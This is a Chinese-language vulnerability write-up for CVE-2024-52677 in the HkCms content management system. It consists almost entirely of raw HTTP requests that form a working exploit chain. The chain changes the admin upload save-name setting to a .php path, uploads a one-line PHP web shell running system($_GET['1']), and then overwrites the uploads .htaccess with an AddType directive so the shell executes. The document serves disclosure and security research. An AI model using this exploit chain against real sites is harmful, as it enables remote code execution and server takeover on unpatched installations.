CVE-2024-52677

本文最后更新于 2026年4月16日下午

参考链接

NVD - CVE-2024-52677

HkCms 开源内容管理系统《免授权，永久免费商用》是一款基于 ThinkPHP6.0 开发的 CMS 系统。以免费开源、无需授权、系统易安装升级、界面功能简洁轻便、易上手、插件与模板在线升级安装、建站联盟扶持计划等优势为一体的 CMS 系统。

官网：https://www.hkcms.cn/

Version：HkCms-v2.3.2.240702

测试环境：phpstudy - Apache2.4.39+Mysql8.0.12+PHP 7.3.4

利用

执行安装后登录后台

在配置中心->站点配置->附件配置中可以设置保存格式

可以直接设置为xxx.php

点击提交

POST /admin.php/routine.config/edit.html HTTP/1.1
Host: hkcms666
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
X-Requested-With: XMLHttpRequest
Origin: http://hkcms666
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Accept: application/json, text/javascript, */*; q=0.01
Cookie: admin_hkcms_lang=zh-cn; HKCMSSESSID=d0f6045d86e047d24fa4082dad7f0363
Content-Length: 3534

row%5Btitle%5D=HkCms%E5%BC%80%E6%BA%90%E5%86%85%E5%AE%B9%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F&row%5Bhome_title%5D=HkCms%E6%BC%94%E7%A4%BA%E7%AB%99%E7%82%B9%20-%20%E7%BD%91%E7%AB%99%E9%A6%96%E9%A1%B5&row%5Bkeyword%5D=%E5%BC%80%E6%BA%90%E3%80%81%E5%8F%AF%E5%95%86%E7%94%A8%E3%80%81%E5%85%8D%E6%8E%88%E6%9D%83%E3%80%81%E5%BC%80%E7%AE%B1%E5%8D%B3%E7%94%A8&row%5Bdescription%5D=HkCms%E5%BC%80%E6%BA%90%E5%86%85%E5%AE%B9%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%E6%98%AF%E4%B8%80%E6%AC%BE%E5%9F%BA%E4%BA%8EThinkPHP6.0%E5%BC%80%E5%8F%91%E7%9A%84CMS%E7%B3%BB%E7%BB%9F%E3%80%82%E4%BB%A5%E5%85%8D%E6%8E%88%E6%9D%83%E3%80%81%E6%B0%B8%E4%B9%85%E5%95%86%E7%94%A8%E3%80%81%E7%B3%BB%E7%BB%9F%E6%98%93%E5%AE%89%E8%A3%85%E5%8D%87%E7%BA%A7%E3%80%81%E7%95%8C%E9%9D%A2%E5%8A%9F%E8%83%BD%E7%AE%80%E6%B4%81%E8%BD%BB%E4%BE%BF%E3%80%81%E6%98%93%E4%B8%8A%E6%89%8B%E3%80%81%E6%8F%92%E4%BB%B6%E4%B8%8E%E6%A8%A1%E6%9D%BF%E5%9C%A8%E7%BA%BF%E5%8D%87%E7%BA%A7%E5%AE%89%E8%A3%85%E3%80%81%E5%BB%BA%E7%AB%99%E8%81%94%E7%9B%9F%E6%89%B6%E6%8C%81%E8%AE%A1%E5%88%92%E7%AD%89%E4%BC%98%E5%8A%BF%E4%B8%BA%E4%B8%80%E4%BD%93%E7%9A%84CMS%E7%B3%BB%E7%BB%9F%E3%80%82&row%5Bicp%5D=%E7%B2%A4ICP%E5%A4%8710000000%E5%8F%B7-1&row%5Bpsrn%5D=%E4%BA%AC%E5%85%AC%E7%BD%91%E5%AE%89%E5%A4%8710000000%E5%8F%B7&row%5Bcdn%5D=&row%5Blogo%5D=http%3A%2F%2Fholuo.cn-gd.ufileos.com%2Fhkcms%2Flogo.png&row%5Bfavicon%5D=%2Ffavicon.ico&row%5Bversion%5D=1.0.0&row%5Bthirdcode_pc%5D=&row%5Bthirdcode_mobile%5D=&row%5Bdev%5D=disabled&row%5Bweb_status%5D=1&row%5Bmail_on%5D=0&row%5Bmail_type%5D=smtp&row%5Bmail_server%5D=smtp.qq.com&row%5Bmail_port%5D=465&row%5Bmail_from%5D=&row%5Bmail_fname%5D=&row%5Bmail_auth%5D=ssl&row%5Bmail_user%5D=&row%5Bmail_password%5D=&row%5Bfile_type%5D=jpg%7Cgif%7Cpng%7Cbmp%7Cjpeg%7Cico%7Cwebp%7Czip%7Cgz%7Crar%7Ciso%7Ctxt%7Cdoc%7Cxls%7Cxlsx%7Cppt%7Cwps%7Cswf%7Cmpg%7Cmp3%7Crm%7Crmvb%7Cwmv%7Cwma%7Cwav%7Cmid%7Cmov%7Cmp4%7Cdocx&row%5Bfile_size%5D=10&row%5Bupload_url%5D=%2Fcommon%2Fupload&row%5Bcdn_url%5D=&row%5Bsavename%5D=%2Fuploads%2F1.php&row%5Bchunk%5D=2&row%5Bchunk_size%5D=2&row%5Bcontent_lang_on%5D=2&row%5Badmin_lang_on%5D=2&row%5Bindex_lang_on%5D=2&row%5Bcloud_username%5D=&row%5Bcloud_password%5D=&row%5Badmin_theme%5D=adminlte&row%5Bindex_theme%5D=default&row%5Burl_rewrite%5D=%7B%22tags%2Findex%22%3A%22%2Ft%2Findex%24.html%22%2C%22tags%2Flists%22%3A%22%2Ft%2F%3Atag%24.html%22%2C%22search%2Findex%22%3A%22%2Fsearch%24.html%22%2C%22guestbook%2Findex%22%3A%22%2Fguestbook%24.html%22%2C%22index%2Flists%22%3A%22%2F%3Acatname%2F%24%2C%2F%3Acatname%2Flist_%3Apage%24.html%22%2C%22index%2Fshow%22%3A%22%2F%3Acatname%2F%3Aid%24.html%22%7D&keyvalue1=tags%2Findex&keyvalue1=%2Ft%2Findex%24.html&keyvalue2=tags%2Flists&keyvalue2=%2Ft%2F%3Atag%24.html&keyvalue3=search%2Findex&keyvalue3=%2Fsearch%24.html&keyvalue4=guestbook%2Findex&keyvalue4=%2Fguestbook%24.html&keyvalue5=index%2Flists&keyvalue5=%2F%3Acatname%2F%24%2C%2F%3Acatname%2Flist_%3Apage%24.html&keyvalue6=index%2Fshow&keyvalue6=%2F%3Acatname%2F%3Aid%24.html&row%5Bmobile_domain%5D=&row%5Buser_on%5D=1&row%5Bregister_captcha%5D=2&row%5Blogin_captcha%5D=2&row%5Blogin_fail_count%5D=5&group%5Bkey%5D%5B%5D=basics&group%5Bvalue%5D%5B%5D=Basic%20config&group%5Bkey%5D%5B%5D=mail&group%5Bvalue%5D%5B%5D=Mail%20config&group%5Bkey%5D%5B%5D=upload&group%5Bvalue%5D%5B%5D=Upload%20config&group%5Bkey%5D%5B%5D=language&group%5Bvalue%5D%5B%5D=Language&group%5Bkey%5D%5B%5D=more&group%5Bvalue%5D%5B%5D=Advanced%20config&group%5Bkey%5D%5B%5D=member&group%5Bvalue%5D%5B%5D=Member%20Center&__token__=99a05e6dd553802e45cc0195fcc8e595

然后在附件管理处上传文件

后缀为.txt内容为一句话<?php system($_GET['1']);?>

POST /admin.php/common/upload HTTP/1.1
Host: hkcms666
Origin: http://hkcms666
Accept-Language: zh-CN,zh;q=0.9
Cookie: admin_hkcms_lang=zh-cn; HKCMSSESSID=d0f6045d86e047d24fa4082dad7f0363
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarylNgaUYzRi4OQKLcv
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Content-Length: 213

------WebKitFormBoundarylNgaUYzRi4OQKLcv
Content-Disposition: form-data; name="files[]"; filename="test.txt"
Content-Type: text/plain

<?php system($_GET['1']);?>
------WebKitFormBoundarylNgaUYzRi4OQKLcv--

查看uploads目录发现上传成功

访问发现返回403

发现uploads目录下的.hatccess对.php文件设置了访问控制

在配置中心->站点配置->附件配置中可以设置保存格式为/uploads/.htaccess上传来覆盖

POST /admin.php/routine.config/edit.html HTTP/1.1
Host: hkcms666
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.9
Cookie: admin_hkcms_lang=zh-cn; HKCMSSESSID=d0f6045d86e047d24fa4082dad7f0363
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://hkcms666
Content-Length: 3538

row%5Btitle%5D=HkCms%E5%BC%80%E6%BA%90%E5%86%85%E5%AE%B9%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F&row%5Bhome_title%5D=HkCms%E6%BC%94%E7%A4%BA%E7%AB%99%E7%82%B9%20-%20%E7%BD%91%E7%AB%99%E9%A6%96%E9%A1%B5&row%5Bkeyword%5D=%E5%BC%80%E6%BA%90%E3%80%81%E5%8F%AF%E5%95%86%E7%94%A8%E3%80%81%E5%85%8D%E6%8E%88%E6%9D%83%E3%80%81%E5%BC%80%E7%AE%B1%E5%8D%B3%E7%94%A8&row%5Bdescription%5D=HkCms%E5%BC%80%E6%BA%90%E5%86%85%E5%AE%B9%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%E6%98%AF%E4%B8%80%E6%AC%BE%E5%9F%BA%E4%BA%8EThinkPHP6.0%E5%BC%80%E5%8F%91%E7%9A%84CMS%E7%B3%BB%E7%BB%9F%E3%80%82%E4%BB%A5%E5%85%8D%E6%8E%88%E6%9D%83%E3%80%81%E6%B0%B8%E4%B9%85%E5%95%86%E7%94%A8%E3%80%81%E7%B3%BB%E7%BB%9F%E6%98%93%E5%AE%89%E8%A3%85%E5%8D%87%E7%BA%A7%E3%80%81%E7%95%8C%E9%9D%A2%E5%8A%9F%E8%83%BD%E7%AE%80%E6%B4%81%E8%BD%BB%E4%BE%BF%E3%80%81%E6%98%93%E4%B8%8A%E6%89%8B%E3%80%81%E6%8F%92%E4%BB%B6%E4%B8%8E%E6%A8%A1%E6%9D%BF%E5%9C%A8%E7%BA%BF%E5%8D%87%E7%BA%A7%E5%AE%89%E8%A3%85%E3%80%81%E5%BB%BA%E7%AB%99%E8%81%94%E7%9B%9F%E6%89%B6%E6%8C%81%E8%AE%A1%E5%88%92%E7%AD%89%E4%BC%98%E5%8A%BF%E4%B8%BA%E4%B8%80%E4%BD%93%E7%9A%84CMS%E7%B3%BB%E7%BB%9F%E3%80%82&row%5Bicp%5D=%E7%B2%A4ICP%E5%A4%8710000000%E5%8F%B7-1&row%5Bpsrn%5D=%E4%BA%AC%E5%85%AC%E7%BD%91%E5%AE%89%E5%A4%8710000000%E5%8F%B7&row%5Bcdn%5D=&row%5Blogo%5D=http%3A%2F%2Fholuo.cn-gd.ufileos.com%2Fhkcms%2Flogo.png&row%5Bfavicon%5D=%2Ffavicon.ico&row%5Bversion%5D=1.0.0&row%5Bthirdcode_pc%5D=&row%5Bthirdcode_mobile%5D=&row%5Bdev%5D=disabled&row%5Bweb_status%5D=1&row%5Bmail_on%5D=0&row%5Bmail_type%5D=smtp&row%5Bmail_server%5D=smtp.qq.com&row%5Bmail_port%5D=465&row%5Bmail_from%5D=&row%5Bmail_fname%5D=&row%5Bmail_auth%5D=ssl&row%5Bmail_user%5D=&row%5Bmail_password%5D=&row%5Bfile_type%5D=jpg%7Cgif%7Cpng%7Cbmp%7Cjpeg%7Cico%7Cwebp%7Czip%7Cgz%7Crar%7Ciso%7Ctxt%7Cdoc%7Cxls%7Cxlsx%7Cppt%7Cwps%7Cswf%7Cmpg%7Cmp3%7Crm%7Crmvb%7Cwmv%7Cwma%7Cwav%7Cmid%7Cmov%7Cmp4%7Cdocx&row%5Bfile_size%5D=10&row%5Bupload_url%5D=%2Fcommon%2Fupload&row%5Bcdn_url%5D=&row%5Bsavename%5D=%2Fuploads%2F.htaccess&row%5Bchunk%5D=2&row%5Bchunk_size%5D=2&row%5Bcontent_lang_on%5D=2&row%5Badmin_lang_on%5D=2&row%5Bindex_lang_on%5D=2&row%5Bcloud_username%5D=&row%5Bcloud_password%5D=&row%5Badmin_theme%5D=adminlte&row%5Bindex_theme%5D=default&row%5Burl_rewrite%5D=%7B%22tags%2Findex%22%3A%22%2Ft%2Findex%24.html%22%2C%22tags%2Flists%22%3A%22%2Ft%2F%3Atag%24.html%22%2C%22search%2Findex%22%3A%22%2Fsearch%24.html%22%2C%22guestbook%2Findex%22%3A%22%2Fguestbook%24.html%22%2C%22index%2Flists%22%3A%22%2F%3Acatname%2F%24%2C%2F%3Acatname%2Flist_%3Apage%24.html%22%2C%22index%2Fshow%22%3A%22%2F%3Acatname%2F%3Aid%24.html%22%7D&keyvalue1=tags%2Findex&keyvalue1=%2Ft%2Findex%24.html&keyvalue2=tags%2Flists&keyvalue2=%2Ft%2F%3Atag%24.html&keyvalue3=search%2Findex&keyvalue3=%2Fsearch%24.html&keyvalue4=guestbook%2Findex&keyvalue4=%2Fguestbook%24.html&keyvalue5=index%2Flists&keyvalue5=%2F%3Acatname%2F%24%2C%2F%3Acatname%2Flist_%3Apage%24.html&keyvalue6=index%2Fshow&keyvalue6=%2F%3Acatname%2F%3Aid%24.html&row%5Bmobile_domain%5D=&row%5Buser_on%5D=1&row%5Bregister_captcha%5D=2&row%5Blogin_captcha%5D=2&row%5Blogin_fail_count%5D=5&group%5Bkey%5D%5B%5D=basics&group%5Bvalue%5D%5B%5D=Basic%20config&group%5Bkey%5D%5B%5D=mail&group%5Bvalue%5D%5B%5D=Mail%20config&group%5Bkey%5D%5B%5D=upload&group%5Bvalue%5D%5B%5D=Upload%20config&group%5Bkey%5D%5B%5D=language&group%5Bvalue%5D%5B%5D=Language&group%5Bkey%5D%5B%5D=more&group%5Bvalue%5D%5B%5D=Advanced%20config&group%5Bkey%5D%5B%5D=member&group%5Bvalue%5D%5B%5D=Member%20Center&__token__=ae1720d52f7ee9cf7c69bcd36b1a2f7c

上传AddType application/x-httpd-php .png覆盖.htaccess

POST /admin.php/common/upload HTTP/1.1
Host: hkcms666
Origin: http://hkcms666
Accept-Language: zh-CN,zh;q=0.9
Cookie: admin_hkcms_lang=zh-cn; HKCMSSESSID=d0f6045d86e047d24fa4082dad7f0363
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarylNgaUYzRi4OQKLcv
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Content-Length: 213

------WebKitFormBoundarylNgaUYzRi4OQKLcv
Content-Disposition: form-data; name="files[]"; filename="test.txt"
Content-Type: text/plain

AddType application/x-httpd-php .png 
------WebKitFormBoundarylNgaUYzRi4OQKLcv--